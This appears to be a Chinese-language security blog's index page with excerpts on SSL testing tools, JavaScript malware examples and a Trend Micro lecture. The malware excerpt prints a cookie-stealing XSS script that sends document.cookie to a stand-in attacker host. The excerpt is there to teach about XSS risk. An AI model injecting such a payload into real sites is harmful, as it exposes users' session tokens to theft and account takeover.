SSL 相關的測試工具 這篇文章主要說明幾個SSL 的測試工具。Https (TLS/SSL)被應用在 網路服務的加密、驗證與資料完整性的安全傳輸協定。 但是 2014/2015陸續找出許多相關的SSL漏洞,造成 HTTPS不再是安全的傳輸協定。 因此,驗證正確的 HTTPS設定是必要的。這篇文章說明幾種驗證與測試 HTTPS的工具。 SSL 手動測試工具 nmap –script “ssl*” <IP address>…
雲端資訊安全
JavaScript 惡意程式範例
JavaScript 惡意程式範例 這篇文章主要介紹三個JavaScript 惡意程式範例, 說明為什麼XSS是網站風險的第一名。 Cookie stealing 竊取Cookie 可以得知使用者許多使用習慣,甚至是登入的驗證 token [pastacode lang=”javascript” message=”” highlight=”” provider=”manual”] <script language="Javascript"> Document.location='http://www.hacker.com/cookieLogger.php?cookie='+document.cookie; </script> [/pastacode]…
北科大eMBA演講投影片”圖說網路安全” (60頁)
北科大eMBA演講投影片”圖說網路安全” (60頁) 關於我:服務於”趨勢科技” 曾經有某外商銀行的CIO VP問: “How much you know about Security?” 會這樣問表示對於趨勢科技有些陌生 趨勢科技是資訊安全軟體全球領導品牌,致力於建立安全的數位資訊交換世界。全年營收超過 10億美金。 趨勢科技1988年成立於美國加州,總部位於日本東京,於1998年正式在日本東京證交所掛牌上市(股票代碼:4704)。 目前全球營運據點遍及38個國家,共有5,500位員工。 [趨勢科技致力於實現更安全的數位世界] – 與世界最大跨國警察組織 (INTERPOL)合作,協助打擊球網路犯罪,破獲SIMDA殭屍網路行動…